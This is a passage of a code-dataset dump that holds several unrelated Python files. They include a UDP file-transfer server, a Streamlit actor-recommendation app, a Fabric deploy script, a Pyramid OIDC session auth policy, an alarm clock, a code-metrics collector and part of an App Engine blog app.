my_dict[key].append(new_valueaa)\n\n for word in sorted (index,key=str.upper()):\n print(word,index[word])\n","sub_path":"*Fluent_python/Data_struct/dict_.py","file_name":"dict_.py","file_ext":"py","file_size_in_byte":1305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"48460691","text":"# pylint: skip-file\nimport sys\nimport socket\nimport struct\nimport random\nimport os\nimport pathlib\n\ndef computeCheckSum(data):\n checksum = 0\n # checking if this is even\n if len(data)%2 != 0:\n data += '0'\n for i in range(0, len(data), 2):\n element = ord(data[i]) + (ord(data[i+1]) << 8)\n sum = element + checksum\n carry = sum >> 16\n sum = sum & 0xFFFF\n # adding the carry to the LSB\n checksum = sum + carry\n # 1's compliment\n checksum = (~checksum) & 0xFFFF\n return checksum\n\ndef receivingHandler(server_socket):\n file = open(FILE_NAME, \"w\")\n expected_seq = 0\n is_file_received = False\n while not is_file_received:\n packet, client_address = server_socket.recvfrom(BUFFER_SIZE)\n header = struct.unpack('!IHH', packet[0:8])\n sequence_number = header[0]\n # print(\"recv: \", sequence_number)\n data = packet[8:].decode()\n loss_value = random.random()\n # sanity check\n if header[2] == 0b0101010101010101 and computeCheckSum(data) == header[1] and sequence_number <= expected_seq:\n if loss_value > LOSS_PROB:\n server_socket.sendto(struct.pack('!IHH', sequence_number, 0, 0xAAAA), client_address)\n if len(data) > 0 and sequence_number == expected_seq:\n file.write(data)\n expected_seq = expected_seq + 1\n else:\n file.close()\n server_socket.close()\n is_file_received = True\n continue\n else:\n print(\"Packet loss, sequence number = \", sequence_number)\n\n\"\"\"\nCommand:\nSimple_ftp_server port# file-name p\npython3 testserver.py Simple_ftp_server 7735 output.txt 0.07\n\"\"\"\n\n# taking inputs\nif len(sys.argv) != 5 or sys.argv[1] != \"Simple_ftp_server\":\n print(\"Please enter correct command\")\n sys.exit()\n\nSERVER_PORT = int(sys.argv[2])\nFILE_NAME = str(sys.argv[3])\nLOSS_PROB = float(sys.argv[4])\n\n# 8 bytes as header size\nBUFFER_SIZE = 8192\n\nserver_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\nserver_socket.bind((socket.gethostname(), SERVER_PORT))\n\n# deleting already existing file\nold_file = pathlib.Path(FILE_NAME)\nif old_file.is_file():\n os.remove(FILE_NAME)\n\nreceivingHandler(server_socket)\n\nprint(\"File tranfered successfully.\")\n","sub_path":"SelectiveRepeatRequest/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"494666680","text":"import streamlit as st\n# from PIL import Image\n# import cv2 \nimport pandas as pd\nimport numpy as np\nimport os\nimport random\nimport streamlit.components.v1 as components\n\ndef get_rec(input_name,df,k=10):\n name_list = df[0].tolist()\n idx = name_list.index(input_name)\n output = df.iloc[idx,1:k+1].tolist()\n# df_rec = df[df[0]==input_name]\n return output\ndef show_rec(rec_list):\n pic_dir ='actor_pic/'\n alL_mov = os.listdir(pic_dir)\n rec_pic = []\n\n for i in range(len(rec_list)):\n # st.text(rec_df.columns)\n rec_name = rec_list[i]\n mov_dir = pic_dir+rec_name.replace(\" \",\"_\")\n show_num = 0\n try:\n for mov in os.listdir(mov_dir):\n if mov[-5:]=='.jpeg':\n load_image(mov_dir+'/'+mov,title = \"Top %d\"%(i+1),subheader = rec_name)\n show_num+=1\n break\n except:\n place_holder_path = \"image_place_holder/people-icon.png\"\n load_image(place_holder_path,title = \"Top %d\"%(i+1),subheader = rec_name)\n\n return \n \n \ndef load_image(image_path,title='',subheader='', width=100):\n \n st.title(title) \n st.subheader(subheader)\n print(image_path)\n st.image(image_path,width=width)\n\ndef app():\n # try:\n view_net = st.button(\"View NETFLIX social network\")\n\n if view_net:\n st.write(\"This is the network centered around Kevin Bacon. \\nA statement here: all actors in this network is not further than 2 steps away from Kevin Bacon.\\n Do you believe it?\")\n\n # HtmlFile = open(\"sample.html\", 'r', encoding='utf-8')\n HtmlFile = open(\"vis/actor.html\", 'r', encoding='utf-8')\n source_code = HtmlFile.read() \n components.html(source_code, height = 500,width=1000)\n\n # load_image('/Users/luocan/class/2021spring/big_data/final-project/app/actor_net.png',\n # title='Explore the entertainment industry network',subheader='',\n # width = 800)\n\n input_cat = st.sidebar.selectbox(\n 'Who are you?',\n ('actor','director')\n )\n\n if input_cat =='actor':\n output_cat = 'actor'\n else:\n output_cat = st.sidebar.selectbox(\n 'Who are you intersted in?',\n ('actor','director')\n )\n if input_cat =='director':\n input_c = 'd'\n else:\n input_c = 'c'\n if output_cat =='director':\n output_c = 'd'\n else:\n output_c = 'c'\n path = \"../data/net_inf/common_neighbor_%s%s.txt\"%(input_c,output_c)\n df = pd.read_csv(path,header = None)\n name_list = df[0].tolist()\n input_name = st.sidebar.selectbox(\n 'Your name: ',\n sorted(name_list)\n )\n K = st.sidebar.selectbox(\n 'How many recommendation do you want? ',\n list(range(1,11))\n )\n\n rec_list = get_rec(input_name,df,k = K)\n st.title(\"Based on the common neighbors information, we think you might be intersted in these %ss\"%(output_cat))\n show_rec(rec_list)\n\n\n\n\n\n\n\nif __name__ == \"__main__\":\n app()","sub_path":"03-Application/ent_network.py","file_name":"ent_network.py","file_ext":"py","file_size_in_byte":3004,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"405328968","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Mar 12 18:40:57 2020\n\n@author: ASUS\n\"\"\"\n\nfrom bs4 import BeautifulSoup\n\nfrom urllib.request import urlopen\n\n#html = urlopen('https://morvanzhou.github.io/static/scraping/basic-structure.html').read().decode('utf-8')\n\n#soup = BeautifulSoup(html,'html.parser')\n'''\nprint(type(soup))\n#print(soup.h1)\n#print(soup.p)\n\nprint(soup.h1.text)\nprint(soup.p.text)\n\n#透過find_all抓取連結\nall_href = soup.find_all('a')\n\nfindAll 是2.x版本\nfind_all 是3.x版本\n兩者在3.x 均可使用\n\n\n\nprint(all_href)\nfor i in all_href:\n print(i['href'])\n''' \nhtml = urlopen(\"http://www.pythonscraping.com/pages/warandpeace.html\")\nbsObj = BeautifulSoup(html)\nnameList = bsObj.find_all(\"span\",{\"calss':'red\"})\nfor name in nameList:\n print(name.get_text())\n ","sub_path":"0312/py01.py","file_name":"py01.py","file_ext":"py","file_size_in_byte":794,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"313362167","text":"#-*- coding: utf-8 -*-\n\nimport subprocess\nfrom fabric.api import *\nfrom fabric.contrib.console import confirm\n\nenv.hosts = [\"ec2-52-192-156-109.ap-northeast-1.compute.amazonaws.com\"]\nenv.user = \"gituser\"\nenv.key_filename = \"~/.ssh/id_git_rsa\"\nenv.local_src_path = \"/home/hiroaki/working\"\n\ndef hello(name=\"world\"):\n print(\"Hello %s\" % name)\n\ndef get_commit_id():\n \"\"\"\n ~/woking/ディレクトリのmaster branchのcommit idを取得する\n \"\"\"\n with lcd(env.local_src_path): # lcdされないsubprocessだと無効?\n commit_log = local(\"git log --graph --oneline\", capture=True)\n print(commit_log)\n print(\"--------------------------------------\")\n commit_id = input(\"Commit ID >>\")\n if not confirm(\"Do you want to rallback to Commit ID : %s ?\" % commit_id):\n abort(\"Aborting at rollback request.\")\n return commit_id\n\ndef test():\n \"\"\"\n confirmはプロンプト上にY/nの選択肢を表示する\n capture=Trueにするとコマンドの結果を見れる. .failed or return_codeで\n \"\"\"\n\n with settings(warn_only=True):\n result = local(\"nosetests\", capture=True)\n if result.failed and not confirm(\"Tests failed. Continue anyway?\"):\n abort(\"Aborting ad user request.\")\n\ndef commit(message=\"default commit\"):\n local(\"git add -A && git commit -m \\\"%s\\\"\" % message)\n\ndef push():\n local(\"git push origin master\")\n\ndef pre_deploy():\n with lcd(env.local_src_path):\n #test()\n print(env.local_src_path)\n commit()\n push()\n\ndef deploy():\n code_dir = \"~/working/\"\n with cd(code_dir): # デプロイ先ディレクトリに移動して\n run(\"git pull ~/repos/working.git master\") # リモートで実行する\n\ndef rollback():\n \"\"\"\n working ディレクトリでgit log --graph --onelineしてcommit idを取得すること\n 最後のcommitが最初に表示される\n \"\"\"\n commit_id = get_commit_id()\n with lcd(env.local_src_path):\n local(\"git revert %s\" % commit_id)\n push()\n","sub_path":"fabfile.py","file_name":"fabfile.py","file_ext":"py","file_size_in_byte":2023,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"210813390","text":"dict_line = {}\n\nfor line in lines:\n dict_line[line[2]] = line\n\nfile_4 = open('/users/kcnco/github/100knock2021/pan/chapter02/col4.txt', 'w')\nfor elem in sorted(dict_line):\n file_4.write('\\t'.join(dict_line[elem]) + '\\n')\n\n##memo\n#a = [5,7,6,3,4,1,2]\n#b = sorted(a)\n#>>> a\n#[5, 7, 6, 3, 4, 1, 2]\n#>>> b\n#[1, 2, 3, 4, 5, 6, 7]\n","sub_path":"pan/chapter02/X18.py","file_name":"X18.py","file_ext":"py","file_size_in_byte":331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"601238364","text":"import logging\n\nfrom jose.exceptions import ExpiredSignatureError\nfrom oauthlib.oauth2.rfc6749.errors import InvalidGrantError\nfrom pyramid.authentication import CallbackAuthenticationPolicy\nfrom pyramid.interfaces import IAuthenticationPolicy\nfrom zope.interface import implementer\n\nfrom ..interfaces import IOIDCUtility\n\n\n@implementer(IAuthenticationPolicy)\nclass OIDCSessionAuthenticationPolicy(CallbackAuthenticationPolicy):\n # This auth policy requires a session factory to be set up.\n # In general cookie base session store won't work, as the cookie payload\n # usually exceeds 4kb\n\n def __init__(self, callback=None, debug=False, **kwargs):\n self.callback = callback\n self.debug = debug\n self.log = logging.getLogger(__name__)\n\n def get_token(self, request):\n # get tokens from session\n tokens = request.session.get('oidc.token')\n if tokens:\n return tokens.get('access_token')\n return None\n\n def _get_utility(self, request):\n return request.registry.getUtility(IOIDCUtility)\n\n def _validate_access_token(self, request):\n # verify access token and return claims\n # TODO: assumes access token is a jwt with useful attributes\n claims = request.environ.get('oidc.claims')\n if claims:\n # we already decoded the access token\n return claims\n oidc = self._get_utility(request)\n try:\n token = self.get_token(request)\n if token:\n claims = oidc.validate_token(token)\n except ExpiredSignatureError:\n # token is expired ... if we have a refresh token, we can try to\n # update the token\n self.log.info('Access Token expired')\n oidc_tokens = request.session.get('oidc.token')\n if not (oidc_tokens and oidc_tokens.get('refresh_token')):\n # no refresh token\n del request.session['oidc.token']\n return None\n # try refresh\n oauth = oidc.get_oauth2_session(request, token=oidc_tokens)\n try:\n self.log.info('Refreshing Access Token...')\n response = oauth.refresh_token(\n oidc.token_endpoint,\n auth=(oidc.client_id, oidc.client_secret)\n )\n self.log.info('Access Token refreshed')\n except InvalidGrantError:\n # most likely because refresh token has expired\n del request.session['oidc.token']\n self.log.info('Access Token refresh failed')\n return None\n # validate id_token\n id_token = oidc.validate_token(response['id_token'])\n access_token = response['access_token']\n claims = oidc.validate_token(access_token)\n # store new tokens in session (store full token response)\n oidc_tokens = dict(response)\n # and the decoded id_token\n oidc_tokens['id_token'] = id_token\n request.session['oidc.token'] = oidc_tokens\n if claims:\n # store claims in familiar place as well\n request.environ['oidc.claims'] = claims\n return claims\n\n # @IAuthenticationPolicy\n def unauthenticated_userid(self, request):\n \"\"\"Get identity from request Auth header without validation\"\"\"\n # we verify and extract the token here, so that we can\n # inspect the claims in the callback\n # if verify fails, we return None\n # any claims in the request.env\n claims = self._validate_access_token(request)\n if not claims:\n return None\n oidc = self._get_utility(request)\n return claims.get(oidc.userid_claim)\n\n # @IAuthenticationPolicy\n def remember(self, request, userid, **kw):\n \"\"\" Return a set of headers suitable for 'remembering' the\n :term:`userid` named ``userid`` when set in a response. An\n individual authentication policy and its consumers can\n decide on the composition and meaning of ``**kw``.\n \"\"\"\n # We already store the tokens in the session ... nothing to do here\n return []\n\n # @IAuthenticationPolicy\n def forget(self, request):\n \"\"\" Return a set of headers suitable for 'forgetting' the\n current user on subsequent requests.\n \"\"\"\n # Clear session\n request.session.invalidate()\n return []\n","sub_path":"src/pyramid_oidc/authentication/session.py","file_name":"session.py","file_ext":"py","file_size_in_byte":4464,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"64816062","text":"from appJar import gui\r\n\r\ndef addItem(maximumLength, itemGroupName, app, press, rowStart = 0, columnStart = 1, bottomButton = False, isFirstAdd = True):\r\n label = \"{} Name \".format(itemGroupName)\r\n heading = \"Add {}s\".format(itemGroupName)\r\n \r\n headingRow = rowStart\r\n entryRow = headingRow + 1\r\n \r\n if not bottomButton:\r\n buttonRow = entryRow\r\n buttonColumn = columnStart + 4\r\n else:\r\n buttonRow = entryRow + 6\r\n buttonColumn = columnStart + 1\r\n \r\n #app.startTab(heading)\r\n app.addLabel(heading, heading, headingRow, columnStart, colspan = 2)\r\n app.addLabelEntry(label, entryRow, columnStart)\r\n if isFirstAdd: app.setEntryFocus(label)\r\n app.setEntryMaxLength(label, maximumLength)\r\n app.addNamedButton(\"Add\", \"Add\" + itemGroupName, press, row = buttonRow, column = buttonColumn)\r\n #app.stopTab()","sub_path":"AddView.py","file_name":"AddView.py","file_ext":"py","file_size_in_byte":872,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"467843109","text":"import os\r\nimport random\r\nimport webbrowser\r\n\r\nfrom datetime import datetime as dt\r\nfrom datetime import timedelta\r\nfrom time import sleep\r\n\r\n\r\ndef get_random_url():\r\n url_list = os.path.join('.', 'music.txt')\r\n with open(url_list, 'r') as file:\r\n urls = file.readlines()\r\n return random.choice([yt_url.strip() for yt_url in urls]) # returning randomly chosen url from the list\r\n\r\n\r\ndef print_header():\r\n print('-------------------------------------------------------')\r\n print(' Set Alarm ')\r\n print('-------------------------------------------------------')\r\n\r\n print()\r\n\r\n\r\ndef get_alarm_time():\r\n user_time = input(\"When do you want to set the alarm? [hh:mm]: \").strip()\r\n while not isinstance(user_time, type(dt.now())): # checking if time is provided correctly\r\n try:\r\n user_time = dt.strptime(user_time, \"%H:%M\")\r\n except ValueError:\r\n print(\"\")\r\n user_time = input(\"Please, give a proper time in format [hh:mm]: \").strip()\r\n user_time = user_time.replace(year=dt.now().year, month=dt.now().month, day=dt.now().day) # correcting date\r\n if user_time > dt.now():\r\n return user_time\r\n else:\r\n return user_time + timedelta(days=1)\r\n\r\n\r\ndef set_alarm(desired_time):\r\n time_left = desired_time - dt.now()\r\n hours_left = int(timedelta.total_seconds(time_left)) / 3600\r\n minutes_left = (int(timedelta.total_seconds(time_left)) / 60) % 60\r\n print('\\nThe alarm will ring in {} hours and {} minutes.'.format(int(hours_left), int(minutes_left)))\r\n\r\n sleep(timedelta.total_seconds(time_left))\r\n\r\n\r\ndef ring_alarm(music_url):\r\n webbrowser.open(music_url)\r\n\r\n\r\ndef check_file():\r\n if not os.path.isfile('music.txt'):\r\n print(\"A file with music urls is missing, creating new one...\\n\")\r\n music_file = open(\"music.txt\", 'w')\r\n music_file.write(\"https://www.youtube.com/watch?v=dQw4w9WgXcQ\\n\")\r\n music_file.close()\r\n\r\n\r\nif __name__ == '__main__':\r\n print_header()\r\n set_another = 'y' # variable used in a loop\r\n check_file() # checking if file with urls exist\r\n\r\n while set_another.lower().strip() == 'y':\r\n url = get_random_url() # choosing random url from a file\r\n\r\n alarm_time = get_alarm_time() # asking for a time to set the alarm\r\n set_alarm(alarm_time)\r\n ring_alarm(url)\r\n\r\n set_another = input(\"Set another alarm? [y/n]: \")\r\n\r\n print(\"\\n Goodbye!\")\r\n print('-------------------------------------------------------\\n')\r\n","sub_path":"alarm.py","file_name":"alarm.py","file_ext":"py","file_size_in_byte":2594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"499134644","text":"import json\nimport os\nimport subprocess\n\nimport git\nimport pandas\nimport shutil\n\nfrom git import Repo\nfrom shared_constants import data_dir, repo_candidates_filename\n\ntemp_repo_dir = \"temp-repo\"\ncode_metrics_file = \"code-metrics.csv\"\ncode_metrics_folder = \"code-metrics\"\n\n\ndef read_json(filename):\n print(\"reading result from {}/{}\".format(data_dir, filename))\n with open(\"{}/{}.json\".format(data_dir, filename), \"r\") as file:\n data = json.load(file)\n\n return data\n\n\ndef main():\n # for all repos\n\n candidate_repos = read_json(repo_candidates_filename)\n\n # create the folder where to store the code metrics\n if not os.path.exists(\"{}/{}\".format(data_dir, code_metrics_folder)):\n os.makedirs(\"{}/{}\".format(data_dir, code_metrics_folder))\n\n metrics = None\n for i in range(0, len(candidate_repos)):\n # for i in range(0, 10):\n\n # create the folder where to store the repos temporarily\n if not os.path.exists(temp_repo_dir):\n os.makedirs(temp_repo_dir)\n\n candidate_repo = candidate_repos[i]\n\n # download repo\n git_url = candidate_repo[\"html_url\"]\n repo_name = candidate_repo[\"name\"]\n\n print(\"============================================\")\n print(\"cloning repository {}\".format(repo_name))\n try:\n Repo.clone_from(git_url, temp_repo_dir)\n except git.exc.GitCommandError:\n print(\"error cloning repository\")\n continue\n\n # calculate code metrics on last snapshot\n print(\"calculating code metrics\")\n repo_id = candidate_repo[\"id\"]\n output_file = \"{}/{}/{}-{}\".format(data_dir, code_metrics_folder, repo_id, code_metrics_file)\n\n if not compute_metrics(output_file):\n continue\n\n temp_frame = prepare_metrics_data(candidate_repo, output_file, repo_id, repo_name)\n\n if metrics is None:\n metrics = temp_frame\n else:\n metrics = pandas.concat([metrics, temp_frame], ignore_index=True)\n\n print(\"save data to csv\")\n metrics.to_csv(\"{}/final-{}\".format(data_dir, code_metrics_file))\n\n shutil.rmtree(temp_repo_dir)\n\n\ndef compute_metrics(output_file):\n # e.g \"Exception in thread \"main\" java.lang.NullPointerException...\"\n # java -jar ck/ck-0.2.1-SNAPSHOT-jar-with-dependencies.jar temp-repo/ data/36057260-code-metrics.csv\n # subprocess.run(\"java -jar ck/ck-0.2.1-SNAPSHOT-jar-with-dependencies.jar {} {}\"\n # .format(temp_repo_dir, output_file), shell=True)\n\n try:\n subprocess.run(\n \" \".join(\n [\"java\", \"-jar\", \"ck/ck-0.2.1-SNAPSHOT-jar-with-dependencies.jar\", temp_repo_dir, output_file]\n ),\n shell=True, check=True,\n timeout=60 * 10\n )\n\n except subprocess.CalledProcessError:\n print(\"exception analysing the repository - skipping\")\n shutil.rmtree(temp_repo_dir)\n return False\n\n except subprocess.TimeoutExpired:\n print(\"timeout analysing the repository - skipping\")\n shutil.rmtree(temp_repo_dir)\n return False\n\n return True\n\n\ndef prepare_metrics_data(candidate_repo, output_file, repo_id, repo_name):\n # analyse code quality vs stars and num contributors\n print(\"preparing data\")\n metrics_raw = pandas.read_csv(output_file)\n metrics_raw.pop(\"file\")\n metrics_raw.pop(\"class\")\n metrics_raw.pop(\"type\")\n # for each metric compute mean, median, Q1, and Q3\n mean = metrics_raw.mean().rename(lambda x: \"average_{}\".format(x))\n median = metrics_raw.median().rename(lambda x: \"median_{}\".format(x))\n q1 = metrics_raw.quantile(q=0.25).rename(lambda x: \"Q1_{}\".format(x))\n q3 = metrics_raw.quantile(q=0.75).rename(lambda x: \"Q3_{}\".format(x))\n temp_frame = pandas.DataFrame(pandas.concat([mean, median, q1, q3])).T\n temp_frame['id'] = repo_id\n temp_frame['name'] = repo_name\n temp_frame['stars'] = candidate_repo[\"stargazers_count\"]\n temp_frame['contributors_total'] = candidate_repo[\"num_contributors\"]\n return temp_frame\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"static_code_metrics.py","file_name":"static_code_metrics.py","file_ext":"py","file_size_in_byte":4112,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"214169032","text":"import os\nimport re\nimport random\nimport webapp2\nimport hashlib\nimport hmac\nimport datetime\nfrom string import letters\n\nimport jinja2\n\nfrom google.appengine.ext import db\nfrom google.appengine.ext.db import metadata\n\ntemplate_dir = os.path.join(os.path.dirname(__file__), 'templates')\njinja_env = jinja2.Environment(loader = jinja2.FileSystemLoader(template_dir),\n autoescape = True)\n\ndef blog_key(name='default'):\n return db.Key.from_path('blogs', name)\n\ndef user_key(group='default'):\n return db.Key.from_path('users', group)\n\ndef post_key(post_id):\n return db.Key.from_path('Post', int(post_id), parent=blog_key())\n\ndef render_str(template, **params):\n tmp = jinja_env.get_template(template)\n return tmp.render(params)\n\ndef like_dup(ent, login_id, post_id):\n key = post_key(post_id)\n like_exists = db.GqlQuery(\"SELECT * \"\n \"FROM \" + ent +\n \" WHERE like_user_id = '\" + login_id +\n \"' AND ANCESTOR IS :1\", key).get()\n return like_exists\n\nclass BlogHandler(webapp2.RequestHandler):\n\n################# ENCRYPTION ###################\n\n def make_salt(self, salt_length=5):\n return ''.join(random.choice(letters)\n for x in xrange(salt_length))\n\n def hash_pass(self, username, password, salt=None):\n if not salt:\n salt = self.make_salt()\n hashed_pass = hashlib.sha256(username + password + salt).hexdigest()\n return '%s|%s' % (salt, hashed_pass)\n\n def valid_pass_hash(self, username, password, hashed_pass):\n salt = hashed_pass.split('|')[0]\n return hashed_pass == self.hash_pass(username, password, salt)\n\n def make_secure_val(self, val):\n return '%s|%s' % (val, hmac.new(COOKIE_SECRET, val).hexdigest())\n\n def get_secure_val(self, secure_val):\n if secure_val:\n val = secure_val.split('|')[0]\n else:\n val = None\n if secure_val == self.make_secure_val(val):\n return val\n\n################# AUTHENTICATION ###################\n\n def user_exists(self, username):\n username_exists = db.GqlQuery(\"SELECT * \"\n \"FROM User \"\n \"WHERE username = :usernm\",\n usernm=username).get()\n return username_exists\n\n def user_auth(self, username, password):\n user = db.GqlQuery(\"SELECT * \"\n \"FROM User \"\n \"WHERE username = :usernm\",\n usernm=username).get()\n if user:\n return self.valid_pass_hash(user.username,\n password,\n user.pass_hash)\n\n################ TEMPLATES ##################\n\n def write(self, *a, **kw):\n self.response.out.write(*a, **kw)\n\n def render_tmp(self, template, **params):\n return render_str(template, **params)\n\n def render(self, template, **kw):\n if self.read_secure_cookie('usercookie'):\n\n user_id = self.read_secure_cookie('usercookie')\n\n key = db.Key.from_path('User',\n int(user_id),\n parent=user_key())\n\n user = db.get(key)\n login_status = \"Logged in as: %s \" % (user.username)\n nav = [('/', 'Home'),\n ('/newpost', 'Create New Post'),\n ('/logout', 'Log Out')]\n else:\n login_status = ''\n user_id = ''\n nav = [('/', 'Home'),\n ('/signup', 'Sign Up'),\n ('/login', 'Log In')]\n self.write(self.render_tmp(template, login_id=user_id,\n nav=nav, login_status=login_status, **kw))\n\n def set_secure_cookie(self, name, val, exp):\n cookie_val = self.make_secure_val(str(val))\n if exp and isinstance(exp, (int, long, float)):\n now = datetime.datetime.utcnow()\n expires = datetime.timedelta(seconds=exp)\n exp_date = (now + expires).strftime(\"%a, %d %b %Y %H:%M:%S GMT\")\n else:\n exp_date = ''\n self.response.headers.add_header(\n 'Set-Cookie',\n '%s=%s; expires=%s; Path=/' % (name, cookie_val, exp_date))\n\n def read_secure_cookie(self, cookie_name):\n if self.request.cookies.get(cookie_name):\n cookie_val = self.request.cookies.get(cookie_name)\n val = self.get_secure_val(cookie_val)\n return val\n else:\n return\n\n############### POST DB MODELS #################\n\nclass Post(db.Model):\n\n author_id = db.StringProperty(required=True)\n author_name = db.StringProperty(required=True)\n subject = db.StringProperty(required=True)\n content = db.TextProperty(required=True)\n created = db.DateTimeProperty(auto_now_add=True)\n modified = db.DateTimeProperty(auto_now=True)\n\n def post_likes(self, post_id):\n\n kinds = metadata.get_kinds()\n if u'PostLike' in kinds:\n likes = db.GqlQuery(\"SELECT * \"\n \"FROM PostLike \"\n \"WHERE ANCESTOR IS :1\",\n post_key(post_id)).count()\n else:\n likes = 0\n return likes\n\n def render_post(self, login_id, post_id):\n likes = self.post_likes(post_id)\n self._render_text = self.content.replace('\\n', '
    ')\n return render_str(\"post.html\", login_id=login_id,\n likes=likes, post=self)\n\n def post_like_dup(self, login_id, post_id):\n exists = like_dup('PostLike', login_id, post_id)\n return exists\n\n############# NEW POST HANDLER ###############\n\nclass NewPost(BlogHandler):\n\n def get(self):\n\n if self.read_secure_cookie('usercookie'):\n self.render(\"newpost.html\")\n else:\n self.redirect('/signup')\n\n def post(self):\n\n auth_error = True\n if self.read_secure_cookie('usercookie'):\n auth_error = False\n else:\n auth_error = True\n username = self.read_secure_cookie('usercookie')\n if not self.user_exists(username):\n auth_error = False\n else:\n auth_error = True\n\n if not auth_error:\n subject_input = self.request.get('subject')\n content_input = self.request.get('content')\n if self.read_secure_cookie('usercookie'):\n\n user_id = self.read_secure_cookie('usercookie')\n key = db.Key.from_path('User', int(user_id), parent=user_key())\n user = db.get(key)\n\n if subject_input and content_input and user_id:\n post = Post(parent=blog_key(),\n author_id=user_id,\n author_name=user.username,\n subject=subject_input,\n content=content_input)\n post.put()\n\n post_id = str(post.key().id())\n self.redirect('/post-%s' % post_id)\n else:\n input_error = \"Please submit both the title and content.\"\n self.render(\"newpost.html\", subject=subject_input,\n content=content_input,\n error=input_error)\n else:\n self.redirect('/signup')\n\n############### POST LINK HANDLER ###############\n\nclass PostLink(BlogHandler):\n\n def get(self, login_id):\n\n url_str = self.request.path\n post_id = url_str.rsplit('post-', 1)[1]\n key = post_key(post_id)\n post = db.get(key)\n\n kinds = metadata.get_kinds()\n\n if u'Comment' in kinds:\n comments = db.GqlQuery(\"SELECT * \"\n \"FROM Comment \"\n \"WHERE ANCESTOR IS :1\", key)\n else:\n comments = ''\n self.render(\"postlink.html\", post=post,\n comments=comments)\n\n def post(self, login_id):\n auth_error = True\n if self.read_secure_cookie('usercookie'):\n auth_error = False\n else:\n auth_error = True\n username = self.read_secure_cookie('usercookie')\n if not self.user_exists(username):\n auth_error = False\n else:\n auth_error = True\n\n if not auth_error:\n edit_post_id = self.request.get('edit_post_id')\n edit_comment_id = self.request.get('edit_comment_id')\n comment_post_id = self.request.get('comment_post_id')\n like_post_id = self.request.get('like_post_id')\n if comment_post_id:\n post_id = comment_post_id\n self.redirect('/newcomment?post_id=' + post_id)\n if edit_post_id:\n post_id = edit_post_id\n self.redirect('/editpost?post_id=' + post_id)\n if edit_comment_id:\n url_str = self.request.path\n post_id = url_str.rsplit('post-', 1)[1]\n comment_id = edit_comment_id\n self.redirect('/editcomment?post_id=%s&comment_id=%s' %\n (post_id, comment_id))\n if like_post_id:\n post_id = like_post_id\n user_id = self.read_secure_cookie('usercookie')\n if not like_dup('PostLike', user_id, post_id):\n like = PostLike(like_user_id=user_id,\n parent=post_key(post_id))\n like.put()\n self.redirect('/post-%s' % post_id)\n else:\n self.redirect('/signup')\n\n############### EDIT POST HANDLER ###################\n\nclass EditPost(BlogHandler):\n\n def get(self):\n\n post_id = self.request.get('post_id')\n key = db.Key.from_path('Post',\n int(post_id),\n parent=blog_key())\n # gets the post data based upon what\n # is passed from post_id into key\n post = db.get(key)\n if self.read_secure_cookie('usercookie'):\n user_id = self.read_secure_cookie('usercookie')\n # If the current logged in user is not the post author\n # it redirects them back to the previous page\n if user_id == post.author_id:\n self.render(\"editpost.html\",\n subject=post.subject,\n content=post.content,\n post_id=post_id)\n else:\n referrer = self.request.headers.get('referer')\n if referrer:\n return self.redirect(referrer)\n return self.redirect_to('/')\n else:\n self.redirect('/signup')\n\n def post(self):\n\n auth_error = True\n if self.read_secure_cookie('usercookie'):\n auth_error = False\n else:\n auth_error = True\n username = self.read_secure_cookie('usercookie')\n if not self.user_exists(username):\n auth_error = False\n else:\n auth_error = True\n\n if not auth_error:\n post_id = self.request.get('post_id')\n subject_input = self.request.get('subject')\n content_input = self.request.get('content')\n post_key = db.Key.from_path('Post',\n int(post_id),\n parent=blog_key())\n post = db.get(post_key)\n if username == post.author_id:\n\n if subject_input and content_input:\n post = db.get(post_key)\n post.subject = subject_input\n post.content = content_input\n post.put()\n\n post_id = str(post.key().id())\n self.redirect('/post-%s' % post_id)\n else:\n input_error = \"Please submit both the title and content.\"\n self.render(\"editpost.html\", subject=subject_input,\n content=content_input,\n error=input_error, post_id=post_id)\n else:\n self.redirect('/signup')\n\n############### DELETE POST ###############\n\nclass DeletePost(BlogHandler):\n\n def post(self):\n\n auth_error = True\n if self.read_secure_cookie('usercookie'):\n auth_error = False\n else:\n auth_error = True\n username = self.read_secure_cookie('usercookie')\n if not self.user_exists(username):\n auth_error = False\n else:\n auth_error = True\n\n if not auth_error:\n post_id = self.request.get('post_id')\n key = db.Key.from_path('Post',\n int(post_id),\n parent=blog_key())\n post = db.get(key)\n if username == post.author_id:\n db.delete(key)\n self.render('/postdeleted.html')\n else:\n self.redirect('/signup')\n\n############### likes db Model ###################\n\nclass PostLike(db.Model):\n like_user_id = db.StringProperty(required=True)\n\n############### COMMENT DB MODELS #################\n\nclass Comment(db.Model):\n\n author_id = db.StringProperty(required=True)\n author_name = db.StringProperty(required=True)\n subject = db.StringProperty(required=True)\n content = db.TextProperty(required=True)\n created = db.DateTimeProperty(auto_now_add=True)\n modified = db.DateTimeProperty(auto_now=True)\n\n def render_comment(self, login_id):\n\n self._render_text = self.content.replace('\\n', '
